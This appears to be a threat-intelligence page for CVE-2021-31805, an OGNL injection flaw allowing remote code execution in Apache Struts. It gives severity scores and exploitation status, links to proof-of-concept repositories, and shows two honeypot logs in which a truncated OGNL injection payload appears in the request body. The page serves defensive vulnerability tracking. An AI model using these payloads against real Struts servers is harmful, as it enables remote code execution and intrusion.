KEVIntel
PRO Back to KEVs
9.8
CVSS
Critical

CVE-2021-31805

PUBLISHED

Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.

Not yet in CISA KEV

Exploited in the wild Active exploitation observed PoC available Remote Low complexity No user interaction Unauthenticated
Vendor
Apache Software Foundation
Product
Apache Struts
Published
Apr 12, 2022
EPSS
93.8% · 100% pctl

Automate This Intelligence with the Pro API

Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.

Learn about Pro

Description

The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.

apache

Weaknesses (CWE)

  • CWE-917

    Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')

CVSS Scores

CVSS v3.1 9.8 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v2.0 7.5 High

AV:N/AC:L/Au:N/C:P/I:P/A:P

Exploitation Status

Exploited in the wild

Recorded 2026-06-12 00:32:51 UTC · KEVIntel

Active exploitation observed

Recorded 2026-06-12 00:32:51 UTC · KEVIntel sensor

Proof of concept available

Recorded 2022-04-15 04:23:44 UTC · GitHub

Observed Exploitation Attempts

Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.

High confidence Active exploitation observed
Attempts Observed
2
Unique Attacker IPs
2
Attacker Countries
🇪🇪 🇸🇬
Sensors Observed
2

Exploitation Attempts Over the Last 30 Days

Loading...

First observed 2026-06-12 00:32 UTC · Last observed 2026-06-15 08:44 UTC

Recent Attempts

Showing observations from the last 30 days.

Attack Time Attacker Sensor Request Confidence Raw Event
2026-06-15 08:44 UTC
about 10 hours ago
🇸🇬 77.93.89.98
Singapore, Singapore
🇪🇺 Splunk Enterprise
POST /
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
 High
View
Attacker 77.93.89.98
🇸🇬 Singapore, Singapore
Request POST /
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Payload fingerprint sha256:3aceb561177b9ef0fa31d4039eb13453981a3eb62e14db958de5233d12d576ea
Payload ------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id" %{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.col
Source KEVIntel Honeypot
2026-06-12 00:32 UTC
4 days ago
🇪🇪 109.206.241.94
Tallinn, Harjumaa, Estonia
🇺🇸 Ivanti Sentry
POST /
Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15
 High
View
Attacker 109.206.241.94
🇪🇪 Tallinn, Harjumaa, Estonia
Request POST /
User-Agent Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15
Payload fingerprint sha256:e3c215a369448b8c88f0a105b447f9e35abd212fb586f3af0309b8bdb190d54e
Payload ------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id" %{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.coll
Source KEVIntel Honeypot

References

Known Exploited Vulnerability Sources

Catalogues that list this CVE as a known exploited vulnerability.

Source Added
KEVIntel First 2026-06-12 00:32 UTC

Scanner Integrations

Scanner Reference Detected
Nuclei https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31805.yaml Apr 25, 2025

Potential Proof of Concepts

These PoCs are unverified and could contain malware. Use at your own risk.

z92g/CVE-2021-31805

github · Created 2022-07-10 14:48:52 UTC · 6 stars

S2-061/S2-062 Struts2 远程命令执行漏洞 POC&EXP

aeyesec/CVE-2021-31805

github · Created 2022-04-15 16:09:52 UTC · 5 stars

PoC for CVE-2021-31805 (Apache Struts2)

Axx8/Struts2_S2-062_CVE-2021-31805

github · Created 2022-04-15 10:28:29 UTC · 11 stars

Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) | 反弹Shell

Wrin9/CVE-2021-31805

github · Created 2022-04-15 04:23:44 UTC · 35 stars

S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE

CVE-2021-31805

nuclei · Created Unknown

Timeline

  • Added to KEVIntel

  • Detected by Nuclei

  • Proof of Concept Exploit Available

  • CVE Published to Public

  • CVE ID Reserved